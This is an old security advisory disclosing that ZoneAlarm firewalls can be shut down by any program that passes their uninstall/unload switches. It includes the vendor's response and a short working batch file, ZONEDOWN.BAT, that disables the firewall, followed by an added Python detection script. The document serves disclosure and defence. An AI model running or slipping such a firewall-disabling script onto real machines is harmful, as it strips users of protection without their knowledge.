Diamond Computer Systems Security Advisory

http://www.diamondcs.com.au/alerts/zonedown.txt

VULNERABILITY: ZoneAlarm and ZoneAlarm Pro can be taken down with a tiny batch file.

SEVERITY: Low-Medium, but as Zone Labs will not be fixing the problem it could be considered Medium-High.

AFFECTED SOFTWARE: "Zone Alarm" and "Zone Alarm Pro" (Zone Labs Inc. - www.zonelabs.com), possibly all versions.

REMOTE EXPLOIT: No.

RELEASE DATE: Friday Dec 29, 2000

VENDOR NOTIFIED: Zone Labs Inc. were notified on Wednesday Dec 27, 2000, but as Zone Labs have given a final response to this particular vulnerability, it can now be disclosed to the public.

---

DESCRIPTION:
ZoneAlarm and ZoneAlarm Pro, like all good multi-file programs, support an Uninstall feature. The Uninstall routine executes zonealarm.exe (or zapro.exe in the Pro version), vsmon.exe and minilog.exe, passing special uninstall and unload parameters to each program. By doing this, ZoneAlarm shuts down its user interface and services.

THE PROBLEM:
By design, ZoneAlarm\ZoneAlarm Pro has no way of determining WHICH program is calling it to unload: the unload and uninstall parameters are honoured no matter who passes them. This allows a trojan to execute the ZoneAlarm programs in exactly the same way and shut down the firewall.

THE EXPLOIT:
A very trivial exploit - all a trojan has to do is look in HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs\ZoneAlarm\InstallDirectory to locate ZoneAlarm.exe (just one of many ways to locate ZoneAlarm), then locate the Windows System32 directory, before executing zonealarm.exe, vsmon.exe and minilog.exe, passing each one the uninstall and unload parameters as specified in ZoneAlarm's Manual Uninstall instructions.

ZONE LABS RESPONSE:
From Conrad Hermann, VP of Engineering at Zone Labs:
"...Of course, you are intended to be able to uninstall ZoneAlarm--as I'm sure you can tell, this is a very important thing to be able to do, since it is an introductory product for new users. In testing ZoneAlarm Pro, it seems you did not set a password, or else you would have reported that the password would be required to shut down using VSMON -unload. Without the password, vsmon -unload doesn't disable security."

In other words, if you get the buy-before-you-try version of ZA (ZoneAlarm Pro) AND you set a password, you won't be vulnerable. As a matter of convenience, the majority of ZoneAlarm Pro users would _NOT_ set a password - and by default there is no need for them to do so. Those who don't set a password, and all regular ZoneAlarm users, are left out in the cold with this one.

DEMONSTRATION:
Running this batch file will shut down your ZoneAlarm\ZoneAlarm Pro firewall. The batch file assumes that you have installed ZoneAlarm\ZoneAlarm Pro into the default directory locations. Needless to say, this isn't a very efficient way of using the exploit, and a trojan would be a lot smarter in determining the locations of the four ZA executables, but this batch file demonstrates the simplicity of the vulnerability.

---File begins: ZONEDOWN.BAT ---
@echo off
@echo Shutting down ZoneAlarm and ZoneAlarm Pro, one moment...
rem User interface, in the default install directory (8.3 short names):
rem zapro.exe is the ZoneAlarm Pro UI, zoneal~1.exe is zonealarm.exe.
c:\progra~1\zonela~1\zoneal~1\zapro.exe -unload
c:\progra~1\zonela~1\zoneal~1\zoneal~1.exe -unload
rem Services, vsmon.exe and minilog.exe. They live under %windir%\system on
rem Windows 9x/ME and %windir%\system32 on Windows NT/2000, so both locations
rem are tried; the pair that does not exist simply fails to run.
%windir%\system\zonelabs\vsmon.exe -unload -uninstall
%windir%\system\zonelabs\minilog.exe -unload -uninstall
%windir%\system32\zonelabs\vsmon.exe -unload -uninstall
%windir%\system32\zonelabs\minilog.exe -unload -uninstall
@echo Finished
@echo on
---File ends---
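A detection-side counterpart to the problem described above (the firewall cannot tell who is passing it -unload/-uninstall, so a defender has to look at who did). This is an added example and is not part of the original DiamondCS advisory or of any Zone Labs code. It assumes process-creation records with Sysmon-style field names (Image, CommandLine, ParentImage); the sample events are constructed to mirror a ZONEDOWN.BAT run and a legitimate uninstall. The advisory does not name the process that drives the real Uninstall routine, so treating only ZoneAlarm's own binaries as trusted parents is an assumption; the 8.3 short name zoneal~1.exe is handled because that is how the batch file invokes zonealarm.exe.

```python
"""Flag ZoneAlarm components told to unload by an unexpected parent process.

Added example, not code from the DiamondCS advisory.  Event records are
constructed, Sysmon-style process-creation fields; the trusted-parent
allowlist is an assumption (the advisory does not name the real uninstaller).
"""
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Optional

# Components named in the advisory.  zonealarm.exe is the only one long enough
# to receive an 8.3 short name (zoneal~1.exe), which is how ZONEDOWN.BAT runs it.
ZA_COMPONENTS = frozenset({"zonealarm.exe", "zapro.exe", "vsmon.exe", "minilog.exe"})
ZA_SHORT_NAME_RE = re.compile(r"^zoneal~\d+\.exe$")

# The switches the Uninstall routine passes; either one shuts down part of the firewall.
UNLOAD_SWITCH_RE = re.compile(r"(?:^|\s)[-/](unload|uninstall)\b", re.IGNORECASE)

# Assumption: besides ZoneAlarm's own binaries, no other parent is expected to
# pass these switches.  Add the real uninstaller here if its name is known.
DEFAULT_TRUSTED_PARENTS: FrozenSet[str] = frozenset()


@dataclass
class Alert:
    image: str
    parent: str
    switches: List[str]
    command_line: str


def basename(path: str) -> str:
    """Lower-case file name from a Windows path (accepts either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_zonealarm_component(name: str) -> bool:
    name = name.lower()
    return name in ZA_COMPONENTS or ZA_SHORT_NAME_RE.match(name) is not None


def unload_switches(command_line: str) -> List[str]:
    """Return the -unload/-uninstall switches present, lower-cased, in order."""
    return [s.lower() for s in UNLOAD_SWITCH_RE.findall(command_line)]


def check_event(event: Dict[str, str],
                trusted_parents: FrozenSet[str] = DEFAULT_TRUSTED_PARENTS) -> Optional[Alert]:
    """Return an Alert for a firewall component unloaded by an untrusted parent, else None."""
    image = basename(event.get("Image", ""))
    if not is_zonealarm_component(image):
        return None                      # not a firewall binary at all
    switches = unload_switches(event.get("CommandLine", ""))
    if not switches:
        return None                      # ordinary start-up, nothing to see
    parent = basename(event.get("ParentImage", ""))
    if is_zonealarm_component(parent) or parent in trusted_parents:
        return None                      # the Uninstall routine driving itself
    return Alert(image, parent, switches, event.get("CommandLine", ""))


def scan(events: List[Dict[str, str]]) -> List[Alert]:
    alerts = []
    for event in events:
        alert = check_event(event)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample: ZONEDOWN.BAT run from cmd.exe on Windows 2000 (events 1-2,
# the first recorded with the short path as typed), a legitimate uninstall (3),
# normal UI start-up (4) and an unrelated program given the same switch (5).
SAMPLE_EVENTS = [
    {"Image": r"c:\progra~1\zonela~1\zoneal~1\zoneal~1.exe",
     "CommandLine": r"c:\progra~1\zonela~1\zoneal~1\zoneal~1.exe -unload",
     "ParentImage": r"C:\WINNT\system32\cmd.exe"},
    {"Image": r"C:\WINNT\system32\zonelabs\vsmon.exe",
     "CommandLine": r"C:\WINNT\system32\zonelabs\vsmon.exe -unload -uninstall",
     "ParentImage": r"C:\WINNT\system32\cmd.exe"},
    {"Image": r"C:\WINNT\system32\zonelabs\minilog.exe",
     "CommandLine": "minilog.exe -unload -uninstall",
     "ParentImage": r"C:\Program Files\Zone Labs\ZoneAlarm\zonealarm.exe"},
    {"Image": r"C:\Program Files\Zone Labs\ZoneAlarm\zapro.exe",
     "CommandLine": r"C:\Program Files\Zone Labs\ZoneAlarm\zapro.exe",
     "ParentImage": r"C:\WINNT\explorer.exe"},
    {"Image": r"C:\WINNT\system32\notepad.exe",
     "CommandLine": "notepad.exe -unload",
     "ParentImage": r"C:\WINNT\system32\cmd.exe"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"ALERT: {alert.parent} ran {alert.image} with {' '.join(alert.switches)}")
```

Only the two cmd.exe-driven launches are reported; the uninstall routine unloading its own service and a plain UI start-up are not. Note that the vendor's password protection (where set) changes whether vsmon -unload succeeds, not whether the attempt happens, so the parent check is worth alerting on either way.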


--
DiamondCS would like to thank Steve Gibson of grc.com for his mutual assistance to both DiamondCS and Zone Labs.

Publishing of this document is permitted providing the text is published in its entirety and with no modifications.

Copyright (C) 2000, Diamond Computer Systems Pty. Ltd.
http://www.diamondcs.com.au - http://www.diamondcslabs.com